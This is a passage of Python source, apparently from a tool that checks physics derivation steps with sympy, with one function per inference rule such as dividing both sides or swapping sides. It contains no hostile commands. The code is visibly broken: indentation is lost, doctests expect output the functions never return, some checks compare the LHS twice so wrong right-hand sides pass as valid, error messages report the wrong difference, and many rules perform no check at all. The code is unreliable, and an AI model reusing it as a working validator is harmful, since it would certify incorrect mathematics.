>>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
>>> latex_dict['feed'] = [parse_latex('d')]
>>> latex_dict['output'] = [{'LHS': parse_latex('(a + b)/d'), 'RHS': parse_latex('c/d')}]
>>> divide_both_sides_by(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["LHS"], sympy.Pow(latex_dict["feed"][0], -1))
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["RHS"], sympy.Pow(latex_dict["feed"][0], -1))
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def change_variable_X_to_Y(latex_dict: dict) -> str:
"""
given 'a + b = c',
subsitute b --> d
to get 'a + d = c'
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
>>> latex_dict['feed'] = [parse_latex('b'), parse_latex('d')]
>>> latex_dict['output'] = [{'LHS': parse_latex('a + d'), 'RHS': parse_latex('c')}]
>>> change_variable_X_to_Y(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
# logger.debug('input: ' + str(latex_dict['input']))
# logger.debug('feed: ' + str(latex_dict['feed']))
# logger.debug('output: ' + str(latex_dict['output']))
d1 = sympy.simplify(
latex_dict["input"][0]["LHS"].subs(latex_dict["feed"][0], latex_dict["feed"][1])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
latex_dict["input"][0]["RHS"].subs(latex_dict["feed"][0], latex_dict["feed"][1])
- latex_dict["output"][0]["RHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def multiply_LHS_by_unity(latex_dict: dict) -> str:
"""
see also multRHSbyUnity
Given a = b
mult LHS by (c/c)
get (a*c)/c = b
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
>>> latex_dict['feed'] = [parse_latex('c/c')]
>>> latex_dict['output'] = [{'LHS': parse_latex('(a c)/c'), 'RHS': parse_latex('b')}]
>>> multiply_LHS_by_unity(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["feed"][0] - 1)
d2 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["LHS"]
)
d3 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["RHS"])
if (d1 == 0) and (d2 == 0) and (d3 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return (
"feed diff is "
+ str(d1)
+ "\n"
+ "LHS diff is "
+ str(d2)
+ "\n"
+ "RHS diff is "
+ str(d3)
)
def multiply_RHS_by_unity(latex_dict: dict) -> str:
"""
see also multLHSbyUnity
Given a = b
mult by (c/c)
get a = (b*c)/c
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')}]
>>> latex_dict['feed'] = [parse_latex('c/c')]
>>> latex_dict['output'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('(b c)/c')}]
>>> multiply_RHS_by_unity(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["feed"][0] - 1)
d2 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["RHS"]
)
d3 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["LHS"])
if (d1 == 0) and (d2 == 0) and (d3 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return (
"feed diff is "
+ str(d1)
+ "\n"
+ "LHS diff is "
+ str(d3)
+ "\n"
+ "RHS diff is "
+ str(d2)
)
def add_zero_to_LHS(latex_dict: dict) -> str:
"""
see also add_zero_to_RHS
((feed==0) and (out_lhs0 == (in_lhs0+zero)) and (out_rhs0 == in_rhs0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> add_zero_to_LHS(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["feed"][0])
d2 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["LHS"]
)
d3 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["RHS"])
if (d1 == 0) and (d2 == 0) and (d3 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return (
"feed diff is "
+ str(d1)
+ "\n"
+ "LHS diff is "
+ str(d2)
+ "\n"
+ "RHS diff is "
+ str(d3)
)
def add_zero_to_RHS(latex_dict: dict) -> str:
"""
((feed==0) and (out_rhs0 == (in_rhs0+zero)) and (out_lhs0 == in_lhs0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> add_zero_to_RHS(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["feed"][0])
d2 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["RHS"], latex_dict["feed"][0])
- latex_dict["output"][0]["RHS"]
)
d3 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["LHS"])
if (d1 == 0) and (d2 == 0) and (d3 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return (
"feed diff is "
+ str(d1)
+ "\n"
+ "LHS diff is "
+ str(d3)
+ "\n"
+ "RHS diff is "
+ str(d2)
)
def take_curl_of_both_sides(latex_dict: dict) -> str:
"""
((out_lhs0 == (\nabla \times in_lhs0)) and (out_rhs0 == \nabla \times in_rhs0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> take_curl_of_both_sides(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def apply_divergence(latex_dict: dict) -> str:
"""
Curl: $\vec{\nabla} \cdot$
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> apply_divergence(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def indefinite_integral_over(latex_dict: dict) -> str:
"""
((out_lhs0 == (\int in_lhs0 feed0)) and (out_rhs0 == \int in_rhs0 feed0))
Given a = b
over dt
get \inf a dt = \inf b dt
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> indefinite_integral_over(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def indefinite_integration(latex_dict: dict) -> str:
"""
((out_lhs0 == (\int in_lhs0 )) and (out_rhs0 == \int in_rhs0 ))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> indefinite_integration(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def indefinite_integrate_LHS_over(latex_dict: dict) -> str:
"""
((out_lhs0 == (\int in_lhs0 feed0)) and (out_rhs0 == in_rhs0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> indefinite_integrate_LHS_over(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def indefinite_integrate_RHS_over(latex_dict: dict) -> str:
"""
((out_lhs0 == in_lhs0) and (out_rhs0 == \int in_rhs0 feed0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> indefinite_integrate_RHS_over(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def integrate_over_from_to(latex_dict: dict) -> str:
"""
((out_lhs0 == (\int_{feed1}^{feed2} in_lhs0 feed0)) and (out_rhs0 == \int_{feed1}^{feed2} in_rhs0 feed0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> integrate_over_from_to(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def partially_differentiate_with_respect_to(latex_dict: dict) -> str:
"""
\frac{\partial}{\partial #1}
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> partially_differentiate_with_respect_to(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def X_cross_both_sides_by(latex_dict: dict) -> str:
"""
arg x LHS = arg x RHS
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> X_cross_both_sides_by(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def both_sides_cross_X(latex_dict: dict) -> str:
"""
LHS x arg = RHS x arg
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> both_sides_cross_X(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def X_dot_both_sides(latex_dict: dict) -> str:
"""
arg \cdot LHS = arg \cdot RHS
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> X_dot_both_sides(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def both_sides_dot_X(latex_dict: dict) -> str:
"""
LHS \cdot arg = RHS \cdot arg
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> both_sides_dot_X(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def make_expr_power(latex_dict: dict) -> str:
"""
((out_lhs0 == (feed0)**(in_lhs0)) and (out_rhs0 == (feed0)**(in_rhs0)))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> make_expr_power(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
latex_dict["output"][0]["LHS"]
- sympy.Pow(latex_dict["feed"][0], latex_dict["input"][0]["LHS"])
)
d2 = sympy.simplify(
latex_dict["output"][0]["RHS"]
- sympy.Pow(latex_dict["feed"][0], latex_dict["input"][0]["RHS"])
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def select_real_parts(latex_dict: dict) -> str:
"""
sympy.re(2+3*sympy.I)==2
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> select_real_parts(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def select_imag_parts(latex_dict: dict) -> str:
"""
sympy.im(2+3*sympy.I)==3
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> select_imag_parts(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def swap_LHS_with_RHS(latex_dict: dict) -> str:
"""
((in_lhs0 == out_rhs0) and (in_rhs0 == out_lhs0))
given 'a + b = c'
get 'c = a + b'
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a + b'), 'RHS': parse_latex('c')}]
>>> latex_dict['output'] = [{'LHS': parse_latex('c'), 'RHS': parse_latex('a + b')}]
>>> swap_LHS_with_RHS(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["RHS"])
d2 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["LHS"])
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d1)
def sum_exponents_LHS(latex_dict: dict) -> str:
"""
see also sum_exponents_RHS
(in_rhs0 == out_rhs0)
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> sum_exponents_LHS(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = 0 # not sure what this should be yet
d2 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["LHS"])
logger.info("[trace end " + trace_id + "]")
return "no check performed"
def sum_exponents_RHS(latex_dict: dict) -> str:
"""
see also sum_exponents_LHS
(in_lhs0 == out_lhs0)
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> sum_exponents_RHS(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["RHS"])
d2 = 0 # not sure what this should be yet
logger.info("[trace end " + trace_id + "]")
return "no check performed"
def add_expr_1_to_expr_2(latex_dict: dict) -> str:
"""
assumes result form LHS(X)+LHS(Y)=RHS(X)+RHS(Y)
(((in_lhs0+in_lhs1)==out_lhs0) and ((in_rhs0+in_rhs1)==out_rhs0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> add_expr_1_to_expr_2(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["input"][1]["LHS"])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
sympy.Add(latex_dict["input"][0]["LHS"], latex_dict["input"][1]["LHS"])
- latex_dict["output"][0]["LHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d1)
def substitute_RHS_of_expr_1_into_expr_2(latex_dict: dict) -> str:
"""
Given a = b
and c = b*d
get c = a*d
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
{'LHS': parse_latex('c'), 'RHS': parse_latex('b d')}]
>>> latex_dict['output'] = [{'LHS': parse_latex('c'), 'RHS': parse_latex('a d')}]
>>> substitute_RHS_of_expr_1_into_expr_2(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def substitute_LHS_of_expr_1_into_expr_2(latex_dict: dict) -> str:
"""
Given a = b
and c = a*d
get c = b*d
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex('a'), 'RHS': parse_latex('b')},
{'LHS': parse_latex('c'), 'RHS': parse_latex('a d')}]
>>> latex_dict['output'] = [{'LHS': parse_latex('c'), 'RHS': parse_latex('b d')}]
>>> substitute_LHS_of_expr_1_into_expr_2(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def mult_expr_1_by_expr_2(latex_dict: dict) -> str:
"""
((in_lhs0*in_lhs1 == out_lhs0) and (in_rhs0*in_rhs1 == out_rhs0))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> mult_expr_1_by_expr_2(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["input"][1]["LHS"])
- latex_dict["output"][0]["LHS"]
)
d2 = sympy.simplify(
sympy.Mul(latex_dict["input"][0]["LHS"], latex_dict["input"][1]["LHS"])
- latex_dict["output"][0]["LHS"]
)
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d1)
def LHS_of_expr_1_eq_LHS_of_expr_2(latex_dict: dict) -> str:
"""
((in_lhs0 == in_lhs1) and (out_lhs0 == in_rhs0) and (out_rhs0 == in_rhs1))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> LHS_of_expr_1_eq_LHS_of_expr_2(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["input"][1]["LHS"])
d2 = sympy.simplify(latex_dict["output"][0]["LHS"] - latex_dict["input"][0]["RHS"])
d3 = sympy.simplify(latex_dict["output"][0]["RHS"] - latex_dict["input"][1]["RHS"])
if (d1 == 0) and (d2 == 0) and (d3 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return (
"input diff is "
+ str(d1)
+ "\n"
+ " diff is "
+ str(d2)
+ "\n"
+ " diff is "
+ str(d3)
)
def RHS_of_expr_1_eq_RHS_of_expr_2(latex_dict: dict) -> str:
"""
((in_rhs0 == in_rhs1) and (out_lhs0 == in_lhs0) and (out_rhs0 == in_lhs1))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> RHS_of_expr_1_eq_RHS_of_expr_2(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["input"][1]["RHS"])
d2 = sympy.simplify(latex_dict["output"][0]["LHS"] - latex_dict["input"][0]["LHS"])
d3 = sympy.simplify(latex_dict["output"][0]["RHS"] - latex_dict["input"][1]["LHS"])
if (d1 == 0) and (d2 == 0) and (d3 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return (
"input diff is "
+ str(d1)
+ "\n"
+ " diff is "
+ str(d2)
+ "\n"
+ " diff is "
+ str(d3)
)
def raise_both_sides_to_power(latex_dict: dict) -> str:
"""
((out_lhs0 == (in_lhs0)**(feed0)) and (out_rhs0 == (in_rhs0)**(feed0)))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> raise_both_sides_to_power(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
logger.info("[trace end " + trace_id + "]")
return "no check is performed"
d1 = "not set"
d2 = "not set"
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d2)
def claim_expr_1_equals_expr_2(latex_dict: dict) -> str:
"""
((in_lhs0 == in_lhs1) and (in_rhs0 == in_rhs1))
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> claim_expr_1_equals_expr_2(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["input"][0]["LHS"] - latex_dict["output"][0]["LHS"])
d2 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["output"][0]["RHS"])
if (d1 == 0) and (d2 == 0):
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "LHS diff is " + str(d1) + "\n" + "RHS diff is " + str(d1)
def claim_LHS_equals_RHS(latex_dict: dict) -> str:
"""
(in_lhs0 == in_rhs0)
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> claim_LHS_equals_RHS(latex_dict)
'step is valid'
"""
trace_id = str(random.randint(1000000, 9999999))
logger.info("[trace start " + trace_id + "]")
d1 = sympy.simplify(latex_dict["input"][0]["RHS"] - latex_dict["input"][0]["LHS"])
if d1 == 0:
logger.info("[trace end " + trace_id + "]")
return "valid"
else:
logger.info("[trace end " + trace_id + "]")
return "diff is " + str(d1)
def expand_integrand(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> expand_integrand(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def function_is_even(latex_dict: dict) -> str:
"""
colloquially,
sympy.cos(x)==sympy.cos(-x)
sympy.cos(x) - sympy.cos(-x) == 0
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> function_is_even(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def function_is_odd(latex_dict: dict) -> str:
"""
colloquially,
sympy.sin(-x) == -sympy.sin(x)
sympy.sin(-x) - -sympy.sin(x) == 0
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> function_is_odd(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def conjugate_function_X(latex_dict: dict) -> str:
"""
colloquially,
sympy.conjugate(sympy.I)==-sympy.I
replace f with f^*; replace $i$ with $-i$
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> conjugate_function_X(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def conjugate_both_sides(latex_dict: dict) -> str:
"""
colloquially,
sympy.conjugate(sympy.I)==-sympy.I
Apply ^*; replace $i$ with $-i$
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> conjugate_both_sides(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def conjugate_transpose_both_sides(latex_dict: dict) -> str:
"""
Apply ^+; replace $i$ with $-i$ and transpose matrices
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> conjugate_transpose_both_sides(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def distribute_conjugate_transpose_to_factors(latex_dict: dict) -> str:
"""
Apply ^+; replace $i$ with $-i$ and transpose matrices, rotate bra-ket.
this is a combination of "distribute conjugate" and then "distribute transpose"
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> distribute_conjugate_transpose_to_factors(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def distribute_conjugate_to_factors(latex_dict: dict) -> str:
"""
Apply ^*; replace $i$ with $-i$
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> distribute_conjugate_to_factors(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def expand_magnitude_to_conjugate(latex_dict: dict) -> str:
"""
replace |f|^2 with ff^*
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> expand_magnitude_to_conjugate(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def replace_scalar_with_vector(latex_dict: dict) -> str:
"""
Given F = m*a
Get \vec{F} = m*\vec{a}
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> replace_scalar_with_vector(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
def simplify(latex_dict: dict) -> str:
"""
>>> latex_dict = {}
>>> latex_dict['input'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> latex_dict['feed'] = [parse_latex('')]
>>> latex_dict['output'] = [{'LHS': parse_latex(''), 'RHS': parse_latex('')}]
>>> simplify(latex_dict)
'step is valid'
"""
logger.info("[trace]")
return "no check performed"
